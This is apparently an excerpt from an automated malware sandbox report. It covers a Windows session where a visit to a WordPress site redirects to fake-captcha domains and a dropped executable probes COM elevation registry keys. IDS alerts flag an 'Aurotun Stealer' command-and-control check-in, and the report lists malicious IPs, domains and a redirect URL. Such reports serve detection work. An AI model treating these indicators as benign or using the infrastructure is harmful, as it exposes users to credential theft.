              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: chrome.exeMemory has grown: Private usage: 6MB later: 78MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2061200 - Severity 1 - ET MALWARE Aurotun Stealer CnC Checkin : 192.168.2.24:49724 -> 91.200.14.69:7712
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: analytiscnode.com to https://security.flaweguaard.com/9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c?wsid=cogniai.com&domain=y29nbmlhas5jb20%3d&link=ahr0chm6ly9jb2duawfplmnvbs93cc1jb250zw50l3vwbg9hzhmvmjaymy8xms90ahvtyl9dt0dosufjlunvbmnlchq5luzgltaxlteucg5n
              Source: Network trafficSuricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:59573 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:51544 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.24:49696 -> 104.21.68.46:443
              Source: Network trafficSuricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:57274 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:51796 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.24:49710 -> 172.67.186.167:443
              Source: unknownTCP traffic detected without corresponding DNS query: 13.69.109.130
              Source: unknownTCP traffic detected without corresponding DNS query: 13.69.109.130
              Source: unknownTCP traffic detected without corresponding DNS query: 13.69.109.130
              Source: unknownTCP traffic detected without corresponding DNS query: 13.69.109.130
              Source: unknownTCP traffic detected without corresponding DNS query: 13.69.109.130
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 13.69.109.130
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 13.69.109.130
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: unknownTCP traffic detected without corresponding DNS query: 91.200.14.69
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1host: cogniai.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.8.1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/fancybox.min.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/icon-font.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/bootstrap.min.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/style.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/odometer.min.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/custom.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/flaticon.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/sptech1-1-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/COGNIAI-Concept9-FF-01.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
              Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.8 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/techze-about-76.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
              Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/sptech1-1-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/team.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/jquery.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/fancybox.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/odometer.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/wow.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/swiper.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /s/outfit/v11/QGYyz_MVcBeNP4NjuGObqx1XmO1I4TC1O4a0Ew.woff2 HTTP/1.1host: fonts.gstatic.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CIS2yQEIpbbJAQipncoBCIb0ygEIlaHLAQiKo8sBCIWgzQE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://fonts.googleapis.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/scripts.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/3d.jquery.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/magnific.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/pointer.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/mag.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-12-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-13-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/js/yukari-cik.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/COGNIAI-Concept9-FF-01.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
